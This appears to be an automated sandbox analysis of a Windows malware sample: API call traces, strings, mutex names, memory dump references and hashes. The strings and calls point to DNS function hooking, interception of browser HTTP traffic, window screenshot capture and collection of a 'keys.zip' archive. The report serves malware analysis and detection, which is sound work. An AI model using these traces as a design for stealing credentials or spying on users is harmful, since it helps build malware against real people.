                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD326C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3277
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3291
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD327D
                                                                                                                                                                                                            • Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD31E0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            • API String ID: 505831200-3131017963
                                                                                                                                                                                                            • Opcode ID: 6a5800299db8e7e86de262dd60b1f5868b5493e39049c6a0d23fd1a922f922c9
                                                                                                                                                                                                            • Instruction ID: 7b7cde57d9647831640f838d481e6a93ababbdf98e7367950562e66d2c83ad52
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a5800299db8e7e86de262dd60b1f5868b5493e39049c6a0d23fd1a922f922c9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6110430AC67527BF2705B648C0AF8E77D4AF04B55F508688FB95A21C1EBF094058FA7
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBEB74
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEBD5
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02BBF9DF,?,?), ref: 02BBEC91
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEDD3
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEE8E
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEE9F
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEED1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy$memset
                                                                                                                                                                                                            • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                            • API String ID: 438689982-3158524741
                                                                                                                                                                                                            • Opcode ID: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                            • Instruction ID: 4510274edb432ebf6a99fc4607050113ddef9785de68b889f654054b6fdf902a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1109bc98646473fc0236e641b42992170e3899a8b62bc37ce8f8c6330c5cbada
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2D1F532A042155FEF338E68C8847FEB7A6EF45314F9845D9E906AB261D7F0D842CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA70E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA737
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBA73E
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBA752
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02BBA7C1
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB9523,00008001,?), ref: 02BBA7DA
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBA86B
                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 02BBA882
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA8C9
                                                                                                                                                                                                            • GetWindowInfo.USER32 ref: 02BBA941
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowRect.USER32(?,?), ref: 02BB9FF7
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: IsRectEmpty.USER32(?), ref: 02BBA066
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetWindowLongA.USER32(?,000000F0), ref: 02BBA076
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: GetParent.USER32(?), ref: 02BBA08A
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: MapWindowPoints.USER32(00000000,00000000,?,02BBA6F4), ref: 02BBA093
                                                                                                                                                                                                              • Part of subcall function 02BB9FD0: SetWindowPos.USER32(?,00000000,?,02BBA6F4,00000000,00008001,0000630C,?,02BBA6F4,00000000,00008001,?), ref: 02BBA0B5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 4123185898-4251816714
                                                                                                                                                                                                            • Opcode ID: 212dcce15200272ad6fa827ba5c352b0a8b6823300231638c6a816f1da36f2aa
                                                                                                                                                                                                            • Instruction ID: a4baf29ea786ee0501df891962b240996f20a37a169ffe5f3623952db2409825
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212dcce15200272ad6fa827ba5c352b0a8b6823300231638c6a816f1da36f2aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6191F630A44341ABD7269F28CC88BFA3BE4EF45754F4489A8FA665B2D1C7F4D441CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 02BC92D9
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC930C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC9338
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC935F
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,?), ref: 02BC9392
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BC93AC
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC93B3
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC93C3
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC93CE
                                                                                                                                                                                                            • WSASetLastError.WS2_32(?), ref: 02BC9414
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                            • String ID: GET $POST
                                                                                                                                                                                                            • API String ID: 1455188016-2494278042
                                                                                                                                                                                                            • Opcode ID: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                            • Instruction ID: 22b8a80819cfffc0950c52264a6ad5fb85c2a779152fd9903f27daa9a5c84b96
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4180839888e5c7e628669367a4b1662d10ddda73806f3ac433c5812db92829e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C4120B1D00608EFEB60DFA8D884AEEBBF9EF48704F54456DE515E7200E774A9018FA5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC040B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC040E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC041B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC041E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0437
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC0448
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC0458
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC045B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC0468
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC046B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02BC06DD,00000001), ref: 02BC047B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC047E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?), ref: 02BC048B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BC06DD,00000001,?,?,?,?,?,?,?,?,?,02BC1039,?,?), ref: 02BC048E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2935687291-0
                                                                                                                                                                                                            • Opcode ID: df177777565f008dda8c2ee194ec54370fadec8a300d8e3746864d3f2877ec0d
                                                                                                                                                                                                            • Instruction ID: ac2abdc16ec9d72f14a1b18ff4602d8132a5457ca651a31ad5e9b3a93c68ef5d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df177777565f008dda8c2ee194ec54370fadec8a300d8e3746864d3f2877ec0d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68319671A41220DBDB60AF75E888F5B7FBCEF44755F688859EE08D7680D770C450CAA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CB84), ref: 02BD1A2D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CB84,KBP), ref: 02BD1A47
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02BD19C0
                                                                                                                                                                                                            • KBP, xrefs: 02BD1A33
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                            • API String ID: 4173420962-1701721152
                                                                                                                                                                                                            • Opcode ID: 388d21e32da9516294aa17b68e02dadf28530d190bb901978667a2d67dccf006
                                                                                                                                                                                                            • Instruction ID: 940a88cebf5f0d4d1007363fcfa309b82fa228f4fb357b7dc6c7f65ff04a96ea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 388d21e32da9516294aa17b68e02dadf28530d190bb901978667a2d67dccf006
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE014934AD57127BF37067A84C4AF8E369C9F04B91F500250FB69771C0ABE0A90087BA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB6350
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02BB635A
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75777390), ref: 02BB636A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02BB6383
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02BB639F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02BB63BB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02BB63D7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                            • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                            • API String ID: 2466897691-3547598143
                                                                                                                                                                                                            • Opcode ID: 7fcb61c54695a72068771cae23dde0d4d06e9c7d0a5c1a1863a68b7b94cc3b3c
                                                                                                                                                                                                            • Instruction ID: 474f4c4472c9b39b0d4629f92d17aadd4e3f312169c4e0433bf6ab62c4ff920c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fcb61c54695a72068771cae23dde0d4d06e9c7d0a5c1a1863a68b7b94cc3b3c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95016D61BC171532F962367A1D0BFAF274D8F40E85B5681E0F623F2091DBE4EA014679
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF88F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF892
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF89B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF89E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8B1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8B4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF8BD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8C0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02BBFB54,?), ref: 02BBF8D3
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8D6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BBFB54,?), ref: 02BBF8DF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8E2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02BBFB54,?), ref: 02BBF8F5
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF8F8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02BBFB54,?), ref: 02BBF901
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BBFB54,?), ref: 02BBF904
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 11ecd3d29679ae0524c4373278cf77c50c22b659d61fadc9aeae0bfd8b371bab
                                                                                                                                                                                                            • Instruction ID: 082aafc6b2669f92130cc55d5020ea919961aa19dd4cc1749f22b9292a4fcf94
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11ecd3d29679ae0524c4373278cf77c50c22b659d61fadc9aeae0bfd8b371bab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B114F31A40305B7DB609ABA9C48F6B7F6CEFC4B91F144556BA0C97180CA70E400CAB0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 02BBC96D
                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 02BBC97C
                                                                                                                                                                                                              • Part of subcall function 02BBDCE0: GetClassNameA.USER32(?,?,00000101), ref: 02BBDCF6
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 02BBC9B9
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02BBC9C2
                                                                                                                                                                                                            • PrintWindow.USER32(00000000,?,00000000), ref: 02BBC9D5
                                                                                                                                                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?), ref: 02BBC9FB
                                                                                                                                                                                                            • CreateRectRgn.GDI32(?,?,?,?), ref: 02BBCA11
                                                                                                                                                                                                            • GetWindowRgn.USER32(00000000,00000000), ref: 02BBCA1B
                                                                                                                                                                                                            • OffsetRgn.GDI32(00000000,?,?), ref: 02BBCA35
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02BBCA40
                                                                                                                                                                                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 02BBCA69
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02BBCA72
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BBCA75
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3597830993-0
                                                                                                                                                                                                            • Opcode ID: beee03abb9fc44074462502538a9eecaa986eface2961d62323eb7bb97957e25
                                                                                                                                                                                                            • Instruction ID: f2554b606b81a812f5e64ae8207d3651c42a8e07bcbdd3a45b8cfbaccccc806d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: beee03abb9fc44074462502538a9eecaa986eface2961d62323eb7bb97957e25
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1317C71A40104AFDB61DBA4DC89FBF7BB8EF89691F504549FB01A3181D7B0A811CB64
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 02BDE265
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 02BDE281
                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 02BDE29B
                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 02BDE2B1
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02BDE2DC
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02BDE302
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02BDE375
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02BDE40A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • %02d/%02d/%04d %02d:%02d, xrefs: 02BDE2D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                            • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                            • API String ID: 3846129198-4051342895
                                                                                                                                                                                                            • Opcode ID: e3b9bebe472f954461118ff84e6222c88b1499a8f6c52a6064ea86c04031eb64
                                                                                                                                                                                                            • Instruction ID: 887121f4bb99086a578a7920b41cd7d38fa120a3e3618f651d0293b2a620aff9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3b9bebe472f954461118ff84e6222c88b1499a8f6c52a6064ea86c04031eb64
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F6105719006099FCB21CF68DC44BFEBBF4EF49310F1086A9E94A9B241EB31E555CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                            • API String ID: 761212885-4167808235
                                                                                                                                                                                                            • Opcode ID: 25089cdbb0249060e9f3f5a1584c917bbfa035b686dd42d2ae6dd43619e3dfd3
                                                                                                                                                                                                            • Instruction ID: a4fd0f858a9b8fb7590d9d2e8e4530977a2abbe9d526a93523c36a7d6bc29179
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25089cdbb0249060e9f3f5a1584c917bbfa035b686dd42d2ae6dd43619e3dfd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3951313194464A4FCB1ACB7C98657FA7BF6EF4A300F1485E4D9CAD7240EB719948C780
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
